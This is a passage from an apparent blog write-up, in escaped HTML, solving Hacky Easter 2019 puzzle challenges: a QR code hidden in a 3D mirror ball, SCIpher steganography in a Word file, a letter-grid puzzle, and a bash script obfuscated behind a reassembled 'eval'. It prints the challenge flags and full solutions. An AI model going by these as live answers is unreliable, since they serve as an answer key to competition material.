src=&quot;js\/controls\/OrbitControls.js&quot;&gt;&lt;\/script&gt;\n  &lt;script src=&quot;js\/libs\/dat.gui.min.js&quot;&gt;&lt;\/script&gt;\n  &lt;script src=&quot;js\/mirrors.js&quot;&gt;&lt;\/script&gt;\n<\/pre><\/div>\n<br\/>This file defines an array, which obviously sets the position of each mirror tile:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; title: ; notranslate\" title=\"\">\nvar mirrors = &#x5B;\n    &#x5B;-212.12311944947584, 229.43057454041843, 249.7306422149211],  &#x5B;360.6631259495831, 169.04730469627978, -36.67585520745629],  ...\n<\/pre><\/div>\n<br\/>When beginning to inspect the array within the web developer console, I was quite surprised that the array contains <code>1930<\/code> items, which are far more than I would have expected:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_03.png\" width=\"700\"\/>\n<br\/>\n<br\/>In order to be able to modify the javascript code, the page can be downloaded and run locally. Since the texture images are loaded dynamically through javascript and are not downloaded automatically by the browser, the following adjustment can be made to enable the textures on the local version:\n<br\/>\n<br\/><u>Before<\/u>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: xml; first-line: 79; title: ; notranslate\" title=\"\">\n        var r = &quot;textures\/cube\/Bridge2\/&quot;;\n<\/pre><\/div>\n<br\/><u>After<\/u>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: xml; first-line: 79; title: ; notranslate\" title=\"\">\n        var r = &quot;https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/challenges\/disco2\/textures\/cube\/Bridge2\/&quot;;\n<\/pre><\/div>\n<br\/>After this adjustment the textures are also working in the local version:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_04.png\" width=\"700\"\/>\n<br\/>\n<br\/>Now we can modify the javascript code in order to get an idea of where the egg might be hidden.\n<br\/>\n<br\/>One modification I tested was hiding the actual sphere of the mirror ball. In order to do this, it suffices to comment out the following line:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: xml; first-line: 131; title: ; notranslate\" title=\"\">\n        \/\/scene.add(sphereMesh);\n<\/pre><\/div>\n<br\/>After this change we can see that there are additional mirror tiles within the sphere:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_05.png\" width=\"500\"\/>\n<br\/>\n<br\/>By rotating the sphere around a little bit one can vaguely guess that it is actually a QR code hidden within the sphere.\n<br\/>\n<br\/>In order to get a clean view on it, the outer mirror tiles should be removed.\n<br\/>\n<br\/>Since the outer tiles should all have the same distance from the center, we can determine this distance and filter out all corresponding tiles. At first let&#8217;s display the distance of all tiles by entering the following javascript code in the web developer console:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; title: ; notranslate\" title=\"\">\nmirrors.forEach(tile =&gt; {\n  var len = Math.sqrt(tile&#x5B;0]**2 + tile&#x5B;1]**2 + tile&#x5B;2]**2);\n  console.log(len);\n});\n<\/pre><\/div>\n<br\/>The printed values suggest that the distance of the outer tiles is approximately <code>400.0<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_06.png\" width=\"300\"\/>\n<br\/>\n<br\/>Knowing this we can adjust the javascript code in order to filter out these tiles:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; first-line: 138; highlight: [143,144]; title: ; notranslate\" title=\"\">\n        for (var i = 0; i &lt; mirrors.length; i++) {\n          var m = mirrors&#x5B;i];\n          mirrorTile = new THREE.Mesh(tileGeom, sphereMaterial);\n          mirrorTile.position.set(m&#x5B;0], m&#x5B;1], m&#x5B;2]);\n          mirrorTile.lookAt(center);\n          var len = Math.sqrt(m&#x5B;0]**2 + m&#x5B;1]**2 + m&#x5B;2]**2);\n          if (len &gt; 399.9 &amp;&amp; len &lt; 400.1) continue;\n          scene.add(mirrorTile);\n        }\n<\/pre><\/div>\n<br\/>Now a little bit less imagination is required to recognize the QR code:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_07.png\" width=\"400\"\/>\n<br\/>\n<br\/>\n<br\/>Let&#8217;s add two more changes to make the QR code even more recognizable. At first we can change the texture of the mirror tiles to be simply black:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; first-line: 118; highlight: [120]; title: ; notranslate\" title=\"\">\n        sphereMaterial = new THREE.MeshLambertMaterial({\n          \/\/envMap : textureCube\n          color: 0x000000\n        });\n<\/pre><\/div>\n<br\/>Then we adjust the orientation of the mirror tiles to be aligned with the direction of the bridge by replacing the following line:\n<br\/>        <div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; first-line: 143; highlight: [144]; title: ; notranslate\" title=\"\">\n          \/\/mirrorTile.lookAt(center);\n          mirrorTile.lookAt(new THREE.Vector3(0, 0, 1000));\n<\/pre><\/div>\n<br\/>Now the QR code is clearly visible:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_08.png\" width=\"500\"\/>\n<br\/>\n<br\/>&#8230; and can even be scanned:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg04# zbarimg screen.png\nQR-Code:he19-r5pN-YIRp-2cyh-GWh8\nscanned 1 barcode symbols from 1 images in 0.1 seconds\n<\/pre><\/div>\n<br\/>The flag is <span class=\"spanFlag\">he19-r5pN-YIRp-2cyh-GWh8<\/span>.\n<br\/>\n<h1 id=\"chlg05\">05 &#8211; Call for Papers<\/h1>\nThe challenge provides an <i>MS Word<\/i> file called <code>IAPLI_Conference.docx<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg05_01.png\" width=\"700\"\/>\n<br\/>\n<br\/>The text itself didn&#8217;t seem to contain any useful information. Though, when viewing the properties of the file, I recognized something suspicious:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg05_02.png\" width=\"600\"\/>\n<br\/>\n<br\/>The file was <u>modified<\/u> by <code>Philipp Sieber<\/code>, who probably is the author of the challenge (<code>PS<\/code>). This comes as little surprise. However the file was <u>created<\/u> by <code>SCIpher<\/code>. This doesn&#8217;t look like an usual username. Accordingly I googled for <code>SCIpher<\/code>, which lead me to the following page: <a href=\"https:\/\/pdos.csail.mit.edu\/archive\/scigen\/scipher.html\" target=\"_new\" rel=\"noopener noreferrer\">https:\/\/pdos.csail.mit.edu\/archive\/scigen\/scipher.html<\/a>. As the page states, <i>&#8220;SCIpher is a program that can hide text messages within seemingly innocuous scientific conference advertisements&#8221;<\/i>. In order to extract the hidden text message, we can simply copy&#038;paste the text of the Word file into the following textarea and click on <code>Decode<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg05_03.png\" width=\"600\"\/>\n<br\/>\n<br\/>The hidden message is actually a link:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg05_04.png\" width=\"600\"\/>\n<br\/>\n<br\/>&#8230; which leads us to the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg05_05.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-A6kG-rb9U-Iury-qv93<\/span>.\n<br\/>\n<h1 id=\"chlg06\">06 &#8211; Dots<\/h1>\nThe challenge provides a sudoku-like field with letters:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg06_01.png\" width=\"400\"\/>\n<br\/>\n<br\/>&#8230; as well as another field containing dots:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg06_02.png\" width=\"400\"\/>\n<br\/>\n<br\/>\n<br\/>At first I thought that the dots in the second image indicate, which letters in the first image are relevant. Since this didn&#8217;t lead to anything useful, I tried it the other way round: taking all letters into account, which are <u>not<\/u> covered by a dot. When doing this, I recognized that each dot is in a different inner square and all squares are covered by a dot expect the middle upper as well as the middle right one. So this must be the actual dots of the field located at the bottom right containing a painting of green and golden dots. Thus we got the following letters:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg06_03.png\" width=\"400\"\/>\n<br\/>\n<br\/>\n<br\/>The letters are: <code>CRCHSHTOEDIOLPWAASEWHITSTOE<\/code>\n<br\/>\n<br\/>The first word, which is quite good recognizable within this letters, is <code>PASSWORD<\/code>.\n<br\/>\n<br\/>Extracting this words makes the remaining letters: <code>CCHHTOEILAEWHITSTOE<\/code>.\n<br\/>\n<br\/>Mh, there might also be the word <code>THE<\/code> &#8230; remaining letters: <code>CCHOILAEWHITSTOE<\/code>.\n<br\/>\n<br\/>Probably also <code>IS<\/code> &#8230; remaining letters: <code>CCHOLAEWHITTOE<\/code>.\n<br\/>\n<br\/>The letters at the end look like the word <code>WHITE<\/code> &#8230; remaining letters: <code>CCHOLAETO<\/code>.\n<br\/>\n<br\/>And these letters can be rearranged to the last word, which is: <code>CHOCOLATE<\/code>.\n<br\/>\n<br\/>This makes the final text: <code>THE PASSWORD IS WHITE CHOCOLATE<\/code>.\n<br\/>\n<br\/>Entering the password <code>WHITECHOCOLATE<\/code> in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg06_04.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-n3B2-lZTU-LQTJ-nlRC<\/span>.\n<br\/>\n<h1 id=\"chlg07\">07 &#8211; Shell we Argument<\/h1>\nThe challenge provides the following bash script:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nz=&quot;\n&quot;;ACz=&#039;he&#039;;CCz=&#039;ec&#039;;iHz=&#039;Gr&#039;;vEz=&#039;na&#039;;LBz=&#039;ye&#039;;OFz=&#039;aw&#039;;kDz=&#039; u&#039;;lEz=&#039;r&quot;&#039;;GBz=&#039;Pz&#039;;sDz=&#039;at&#039;;kEz=&#039;et&#039;;HCz=&#039; m&#039;;wEz=&#039;be&#039;;az=&#039;in&#039;;pCz=&#039; w&#039;;UGz=&#039;w=&#039;;qFz=&#039;-9&#039;;WFz=&#039;Ah&#039;;yz=&#039;ag&#039;;ABz=&#039;Lz&#039;;pGz=&#039; 4&#039;;wz=&#039;\/e&#039;;YHz=&#039;$a&#039;;JBz=&#039;8c&#039;;jFz=&#039;{&#039;;KDz=&#039; i&#039;;lFz=&#039;{1&#039;;Kz=&#039;8a&#039;;Wz=&#039;tp&#039;;EFz=&#039;pe&#039;;bDz=&#039;&quot; &#039;;FIz=&#039;py&#039;;sGz=&#039; 3&#039;;IDz=&#039;tw&#039;;PHz=&#039;$J&#039;;HDz=&#039; B&#039;;oz=&#039;f3&#039;;uGz=&#039; 9&#039;;lz=&#039;Tz&#039;;bz=&#039;Wz&#039;;IFz=&#039;y!&#039;;RCz=&#039;di&#039;;NEz=&#039;y &#039;;SFz=&#039;lt&#039;;qDz=&#039;t.&#039;;XCz=&#039; y&#039;;cHz=&#039;$i&#039;;JDz=&#039;: &#039;;xGz=&#039;00&#039;;IHz=&#039;t=&#039;;GDz=&#039;s.&#039;;ICz=&#039;e &#039;;iBz=&#039;oz&#039;;sz=&#039;ht&#039;;hGz=&#039; +&#039;;gFz=&#039;sN&#039;;ODz=&#039; \/&#039;;PDz=&#039;-&#x5B;&#039;;MDz=&#039;fo&#039;;uFz=&#039;$ &#039;;mz=&#039;es&#039;;vFz=&#039;]]&#039;;cGz=&#039;&#x5B; &#039;;WBz=&#039;nz&#039;;ZDz=&#039;d&quot;&#039;;WHz=&#039;$W&#039;;FHz=&#039;$m&#039;;uz=&#039;ck&#039;;lDz=&#039;nd&#039;;HEz=&#039;ot&#039;;rHz=&#039;2&#039;;KHz=&#039;$B&#039;;rBz=&#039; &#x5B;&#039;;dDz=&#039;-R&#039;;Rz=&#039;hz&#039;;jGz=&#039;))&#039;;wBz=&#039;1 &#039;;fBz=&#039;12&#039;;NHz=&#039;$F&#039;;PEz=&#039;yp&#039;;JCz=&#039;so&#039;;LGz=&#039;ce&#039;;jCz=&#039;on&#039;;CFz=&#039;gh&#039;;fFz=&#039;ti&#039;;nCz=&#039;cu&#039;;vz=&#039;Uz&#039;;jEz=&#039;do&#039;;dBz=&#039;ac&#039;; vHz=&#039;ro&#039;;JFz=&#039;$9&#039;;wHz=&#039;ws&#039;;TFz=&#039;qu&#039;;VCz=&#039;wi&#039;;jz=&#039;Iz&#039;;OEz=&#039;bo&#039;;yDz=&#039;t,&#039;;yGz=&#039;7&#039;;LHz=&#039;z$&#039;;fEz=&#039; k&#039;;pHz=&#039;sl&#039;;ADz=&#039;er&#039;;mHz=&#039;om&#039;;nFz=&#039;=~&#039;;WGz=&#039;tc&#039;;oHz=&#039;o!&#039;;sHz=&#039; x&#039;;NCz=&#039;um&#039;;cBz=&#039;cz&#039;;Iz=&#039;.p&#039;;EDz=&#039;gu&#039;;lBz=&#039;42&#039;;SCz=&#039;sc&#039;;BDz=&#039; o&#039;;SGz=&#039;e?&#039;;qHz=&#039;p &#039;;qGz=&#039;65&#039;;VHz=&#039;$U&#039;;oBz=&#039;dz&#039;;IEz=&#039;ai&#039;;ECz=&#039; &quot;&#039;;eCz=&#039;-n&#039;;Vz=&#039;Bz&#039;;tCz=&#039;wh&#039;;fDz=&#039;y,&#039;;uDz=&#039; e&#039;;rz=&#039;Az&#039;;VFz=&#039;ub&#039;;YFz=&#039;h,&#039;;HBz=&#039;m\/&#039;;LFz=&#039;No&#039;;vCz=&#039;iv&#039;;fz=&#039;Yz&#039;;bCz=&#039; -&#039;;LIz=&#039;w,&#039;;OGz=&#039;0 &#039;;GFz=&#039;ea&#039;;dGz=&#039;2 &#039;;iz=&#039;r.&#039;;kFz=&#039;&#x5B;&#x5B;&#039;;tFz=&#039;3}&#039;;ZFz=&#039; f&#039;;HHz=&#039; 5&#039;;LDz=&#039;n &#039;;MFz=&#039;n&#039;\\&#039;&#039;&#039;;BIz=&#039;Fi&#039;;QHz=&#039;$L&#039;;kBz=&#039;mz&#039;;mDz=&#039;st&#039;;Pz=&#039;Xz&#039;;hFz=&#039;r(&#039;;JGz=&#039;se&#039;;oFz=&#039; ^&#039;;CEz=&#039;$3&#039;;iDz=&#039; I&#039;;CHz=&#039;de&#039;;MCz=&#039;rg&#039;;MBz=&#039;Dz&#039;;dHz=&#039;$k&#039;;NGz=&#039;ee&#039;;hz=&#039;Jz&#039;;pBz=&#039;b7&#039;;KGz=&#039;Ni&#039;;mEz=&#039;$7&#039;;JEz=&#039;n.&#039;;QEz=&#039;of&#039;;uCz=&#039; g&#039;;AIz=&#039;$t&#039;;WDz=&#039;re&#039;;XGz=&#039;h=&#039;;tDz=&#039;r &#039;;NBz=&#039;\/\/&#039;;KFz=&#039;-t&#039;;xEz=&#039;, &#039;;DHz=&#039;v\/&#039;;gBz=&#039;bz&#039;;BGz=&#039;Nr&#039;;XBz=&#039;c7&#039;;cFz=&#039;t&#039;\\&#039;&#039;&#039;;IGz=&#039;el&#039;;FBz=&#039;gg&#039;;NDz=&#039;rm&#039;;LEz=&#039;al&#039;;tEz=&#039;. &#039;;Dz=&#039;Cz&#039;;ZBz=&#039;r\/&#039;;XFz=&#039;hh&#039;;YBz=&#039;Qz&#039;;uBz=&#039;-l&#039;;REz=&#039;t&quot;&#039;;oDz=&#039;d &#039;;HIz=&#039;l &#039;;sBz=&#039; $&#039;;PGz=&#039;99&#039;;gGz=&#039;ow&#039;;HGz=&#039;.&quot;&#039;;yHz=&#039;w-&#039;;Yz=&#039;62&#039;;AGz=&#039;&amp; &#039;;hDz=&#039;ut&#039;;yCz=&#039;mb&#039;;pz=&#039;kz&#039;;FDz=&#039;nt&#039;;iEz=&#039;ca&#039;;DDz=&#039;ar&#039;;hBz=&#039;75&#039;;vBz=&#039;t &#039;;Jz=&#039;fz&#039;;IBz=&#039;pz&#039;;rGz=&#039;$4&#039;;CDz=&#039;f &#039;;bGz=&#039; {&#039;;hEz=&#039;w &#039;;Tz=&#039;Rz&#039;;rDz=&#039; r&#039;;ZGz=&#039;=0&#039;;SEz=&#039;$5&#039;;QDz=&#039;a-&#039;;MEz=&#039; v&#039;;eEz=&#039;?.&#039;;vGz=&#039;11&#039;;tHz=&#039;-w&#039;;ZHz=&#039;$c&#039;;gDz=&#039; b&#039;;VEz=&#039;m &#039;;TEz=&#039;-b&#039;;OIz=&#039;h:&#039;;Cz=&#039;&quot;;&#039;;NFz=&#039;ge&#039;;EEz=&#039;Oh&#039;;UHz=&#039;$S&#039;;KIz=&#039;w:&#039;;qBz=&#039;if&#039;;wCz=&#039;rr&#039;;Az=&#039;z=&#039;;qCz=&#039;h &#039;;pDz=&#039;ur&#039;;nBz=&#039;6e&#039;;DGz=&#039;&amp;&amp;&#039;;Ax2=&#039;ev&#039;;RDz=&#039;zA&#039;;cDz=&#039;!=&#039;;QBz=&#039;Hz&#039;;xTT=&#039;al&#039;;DBz=&#039;ha&#039;;QFz=&#039;e!&#039;;aEz=&#039; s&#039;;DIz=&#039; h&#039;;RHz=&#039;$N&#039;;MHz=&#039;$D&#039;;aGz=&#039;()&#039;;jHz=&#039;rf&#039;;MIz=&#039;ed&#039;;GGz=&#039;${&#039;;oGz=&#039;ch&#039;;BCz=&#039;n&#039;;YDz=&#039;ep&#039;;vDz=&#039;ri&#039;;Fz=&#039;s:&#039;;AEz=&#039;sn&#039;;qEz=&#039;ma&#039;;xFz=&#039;$2&#039;;nEz=&#039;-I&#039;;CBz=&#039;Ez&#039;;GEz=&#039;o,&#039;;mGz=&#039;((&#039;;GCz=&#039;ve&#039;;Mz=&#039;e9&#039;;JHz=&#039;&quot;$&#039;;nGz=&#039;(m&#039;;OBz=&#039;iz&#039;;IIz=&#039;nv&#039;;QGz=&#039;9,&#039;;dEz=&#039;ra&#039;;GHz=&#039;eq&#039;;rFz=&#039;]{&#039;;aBz=&#039;ez&#039;;kz=&#039;te&#039;;rCz=&#039;yo&#039;;xz=&#039;Sz&#039;;yFz=&#039; &amp;&#039;;CIz=&#039;eg&#039;;UFz=&#039;ir&#039;;hHz=&#039;z&quot;&#039;;DFz=&#039;ty&#039;;xDz=&#039;em&#039;;DCz=&#039;ho&#039;;xHz=&#039;x-&#039;;nz=&#039;Zz&#039;;FGz=&#039;8 &#039;;lGz=&#039;=$&#039;;CGz=&#039;4 &#039;;Sz=&#039;7e&#039;;kGz=&#039;gt&#039;;uEz=&#039;If&#039;;AHz=&#039; (&#039;;TGz=&#039;lo&#039;;WEz=&#039;cl&#039;;OCz=&#039;en&#039;;pFz=&#039;&#x5B;0&#039;;iCz=&#039;I &#039;;TDz=&#039;] &#039;;ZEz=&#039;hy&#039;;FFz=&#039;s,&#039;;KBz=&#039;Gz&#039;;qz=&#039;15&#039;;nDz=&#039;an&#039;;OHz=&#039;$H&#039;;Gz=&#039;&#039;\\&#039;&#039;;&#039;;BFz=&#039;g &#039;;bEz=&#039;uc&#039;;QCz=&#039;o &#039;;aFz=&#039;! &#039;;Oz=&#039;co&#039;;UDz=&#039;..&#039;;YCz=&#039;ou&#039;;eHz=&#039;$o&#039;;RBz=&#039;as&#039;;BBz=&#039;g-&#039;;PBz=&#039;cd&#039;;tBz=&#039;# &#039;;pEz=&#039;ay&#039;;EGz=&#039;$6&#039;;EBz=&#039;Vz&#039;;Uz=&#039;im&#039;;AFz=&#039;br&#039;;XEz=&#039;ue&#039;;SDz=&#039;-Z&#039;;gCz=&#039; ]&#039;;kCz=&#039;ly&#039;;nHz=&#039;gl&#039;;dCz=&#039;fi&#039;;VDz=&#039;.\/&#039;;gz=&#039;1e&#039;;BHz=&#039;&amp;&gt;&#039;;Ez=&#039;=&#039;\\&#039;&#039;&#039;;gHz=&#039;$r&#039;;ZCz=&#039;ex&#039;;yEz=&#039;ul&#039;;lHz=&#039;ok&#039;;DEz=&#039;-a&#039;;Zz=&#039;Kz&#039;;WCz=&#039;th&#039;;HFz=&#039;ll&#039;;RFz=&#039;&#039;\\&#039;&#039;s&#039;;UCz=&#039;s &#039;;FCz=&#039;Gi&#039;;KEz=&#039;3 &#039;;dz=&#039;rz&#039;;SBz=&#039;Mz&#039;;aDz=&#039;$1&#039;;bBz=&#039;d8&#039;;wFz=&#039;}&#039;;bFz=&#039;Le&#039;;cz=&#039;s\/&#039;;fHz=&#039;$p&#039;;fCz=&#039;10&#039;;aCz=&#039;it&#039;;KCz=&#039;me&#039;; eBz=&#039;gz&#039;;GIz=&#039;il&#039;;sCz=&#039;u &#039;;eDz=&#039;So&#039;;RGz=&#039; p&#039;;yBz=&#039; t&#039;;fGz=&#039;(l&#039;;Xz=&#039;lz&#039;;TBz=&#039;la&#039;;mFz=&#039;} &#039;;VBz=&#039;b.&#039;;YGz=&#039;hi&#039;;EIz=&#039;ap&#039;;XDz=&#039;cc&#039;;LCz=&#039; a&#039;;oCz=&#039;ss&#039;;oEz=&#039;lw&#039;;mBz=&#039;jz&#039;;wDz=&#039;c &#039;;jBz=&#039;4a&#039;;eFz=&#039;nc&#039;;rEz=&#039;ke&#039;;Qz=&#039;a6&#039;;Nz=&#039;Oz&#039;;PCz=&#039;ts&#039;;xCz=&#039;nu&#039;;Bz=&#039;&quot;&#039;;dFz=&#039;fu&#039;;xBz=&#039;];&#039;;jDz=&#039;&#039;\\&#039;&#039;t&#039;;wGz=&#039;$8&#039;;uHz=&#039;ww&#039;;bHz=&#039;$g&#039;;eGz=&#039;$(&#039;;iFz=&#039;) &#039;;YEz=&#039;le&#039;;Hz=&#039;qz&#039;;gEz=&#039;no&#039;;ez=&#039;ng&#039;;kHz=&#039;to&#039;;JIz=&#039;bl&#039;;FEz=&#039; n&#039;;tz=&#039;Fz&#039;;BEz=&#039;t?&#039;;VGz=&#039;0&#039;;UBz=&#039;Nz&#039;;NIz=&#039;ig&#039;;TCz=&#039;us&#039;;lCz=&#039; d&#039;;PFz=&#039;9 &#039;;EHz=&#039; ;&#039;;cCz=&#039;1&#039;;SHz=&#039;$P&#039;;THz=&#039;$Q&#039;;hCz=&#039;; &#039;;sFz=&#039;1,&#039;;Lz=&#039;az&#039;;tGz=&#039;33&#039;;aHz=&#039;$e&#039;;cEz=&#039;a &#039;;MGz=&#039;bu&#039;;sEz=&#039;ad&#039;;iGz=&#039; 1&#039;;UEz=&#039;I&#039;\\&#039;&#039;&#039;;XHz=&#039;$Y&#039;;mCz=&#039;is&#039;;\n$Ax2$xTT &quot;$Az$Bz$z$Cz$Dz$Ez$Fz$Gz$Hz$Ez$Iz$Gz$Jz$Ez$Kz$Gz$Lz$Ez$Mz$Gz$Nz$Ez$Oz$Gz$Pz$Ez$Qz$Gz$Rz$Ez$Sz$Gz$Tz$Ez ...\n<\/pre><\/div>\n<br\/>The first part of the script defines plenty of variables, which are used in the last line of the script. This line begins with <code>$Ax2$xTT<\/code>, which evaluates to <code>eval<\/code> considering the former variable definitions (<code>Ax2='ev'<\/code> and <code>xTT='al'<\/code>). This <code>eval<\/code> instruction is followed by a statement, which is composed of the formerly defined variables. In order to quickly understand, what is passed to <code>eval<\/code>, we can simply replace <code>$Ax2$xTT<\/code> with <code>echo<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\necho &quot;$Az$Bz$z$Cz$Dz$Ez$Fz$Gz$Hz$Ez ...\n<\/pre><\/div>\n<br\/>Running the script outputs the following:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg07# bash eggi_02.sh\nz=&quot;\n&quot;;Cz=&#039;s:&#039;;qz=&#039;.p&#039;;fz=&#039;8a&#039;;az=&#039;e9&#039;;Oz=&#039;co&#039;;Xz=&#039;a6&#039;;hz=&#039;7e&#039;;Rz=&#039;im&#039;;Bz=&#039;tp&#039;;lz=&#039;62&#039;;Kz=&#039;in&#039;;Wz=&#039;s\/&#039;;rz=&#039;ng&#039;;Yz=&#039;1e&#039;;Jz=&#039;r.&#039;;Iz=&#039;te&#039;; Tz=&#039;es&#039;;Zz=&#039;f3&#039;;kz=&#039;15&#039;;Az=&#039;ht&#039;;Fz=&#039;ck&#039;;Uz=&#039;\/e&#039;;Sz=&#039;ag&#039;;Lz=&#039;g-&#039;;Ez=&#039;ha&#039;;Vz=&#039;gg&#039;;Pz=&#039;m\/&#039;;pz=&#039;8c&#039;;Gz=&#039;ye&#039;;Dz=&#039;\/\/&#039;;iz=&#039;cd&#039;;Hz=&#039;as&#039;;Mz=&#039;la&#039;; Nz=&#039;b.&#039;;nz=&#039;c7&#039;;Qz=&#039;r\/&#039;;ez=&#039;d8&#039;;cz=&#039;ac&#039;;gz=&#039;12&#039;;bz=&#039;75&#039;;oz=&#039;4a&#039;;mz=&#039;42&#039;;jz=&#039;6e&#039;;dz=&#039;b7&#039;;\nif &#x5B; $# -lt 1 ]; then\necho &quot;Give me some arguments to discuss with you&quot;\nexit -1\nfi\nif &#x5B; $# -ne 10 ]; then\necho &quot;I only discuss with you when you give the correct number of arguments. Btw: only arguments in the form \/-&#x5B;a-zA-Z] ...\/ are accepted&quot;\nexit -1\nfi\nif &#x5B; &quot;$1&quot; != &quot;-R&quot; ]; then\necho &quot;Sorry, but I don&#039;t understand your argument. $1 is rather an esoteric statement, isn&#039;t it?&quot;\nexit -1\nfi\nif &#x5B; &quot;$3&quot; != &quot;-a&quot; ]; then\necho &quot;Oh no, not that again. $3 really a very boring type of argument&quot;\nexit -1\nfi\nif &#x5B; &quot;$5&quot; != &quot;-b&quot; ]; then\necho &quot;I&#039;m clueless why you bring such a strange argument as $5?. I know you can do better&quot;\nexit -1\nfi\nif &#x5B; &quot;$7&quot; != &quot;-I&quot; ]; then\necho &quot;$7 always makes me mad. If you wanna discuss with be, then you should bring the right type of arguments, really!&quot;\nexit -1\nfi\nif &#x5B; &quot;$9&quot; != &quot;-t&quot; ]; then\necho &quot;No, no, you don&#039;t get away with this $9 one! I know it&#039;s difficult to meet my requirements. I doubt you will&quot;\nexit -1\nfi\necho &quot;Ahhhh, finally! Let&#039;s discuss your arguments&quot;\nfunction isNr() {\n&#x5B;&#x5B; ${1} =~ ^&#x5B;0-9]{1,3}$ ]]\n}\nif isNr $2 &amp;&amp; isNr $4 &amp;&amp; isNr $6 &amp;&amp; isNr $8 &amp;&amp; isNr ${10} ; then\necho &quot;...&quot;\nelse\necho &quot;Nice arguments, but could you formulate them as numbers between 0 and 999, please?&quot;\nexit -1\nfi\nlow=0\nmatch=0\nhigh=0\nfunction e() {\nif &#x5B;&#x5B; $1 -lt $2 ]]; then\nlow=$((low + 1))\nelif &#x5B;&#x5B; $1 -gt $2 ]]; then\nhigh=$((high + 1))\nelse\nmatch=$((match + 1))\nfi\n}\ne $2 465\ne $4 333\ne $6 911\ne $8 112\ne ${10} 007\nfunction b () {\ntype &quot;$1&quot; &amp;&gt; \/dev\/null ;\n}\nif &#x5B;&#x5B; $match -eq 5 ]]; then\nt=&quot;$Az$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Ez$Fz$Kz$Lz$Mz$Nz$Oz$Pz$Ez$Fz$Gz$Hz$Iz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$mz$nz$oz$Zz$pz$qz$rz&quot;\necho &quot;Great, that are the perfect arguments. It took some time, but I&#039;m glad, you see it now, too!&quot;\nsleep 2\nif b x-www-browser ; then\nx-www-browser $t\nelse\necho &quot;Find your egg at $t&quot;\nfi\nelse\necho &quot;I&#039;m not really happy with your arguments. I&#039;m still not convinced that those are reasonable statements...&quot;\necho &quot;low: $low, matched $match, high: $high&quot;\nfi\n<\/pre><\/div>\n<br\/>Again there are a few variable definitions at the beginning followed by different tests on the given arguments. Without actually digging deeper into these tests, we can see that a variable called <code>t<\/code> is defined at the bottom, which uses the formerly defined variables. So let&#8217;s copy&#038;paste the variable definitions from the beginning as well as the definition of <code>t<\/code> to a new script and output the variable <code>t<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg07# cat solution.sh\nz=&quot;\n&quot;;Cz=&#039;s:&#039;;qz=&#039;.p&#039;;fz=&#039;8a&#039;;az=&#039;e9&#039;;Oz=&#039;co&#039;;Xz=&#039;a6&#039;;hz=&#039;7e&#039;;Rz=&#039;im&#039;;Bz=&#039;tp&#039;;lz=&#039;62&#039;;Kz=&#039;in&#039;;Wz=&#039;s\/&#039;;rz=&#039;ng&#039;;Yz=&#039;1e&#039;; 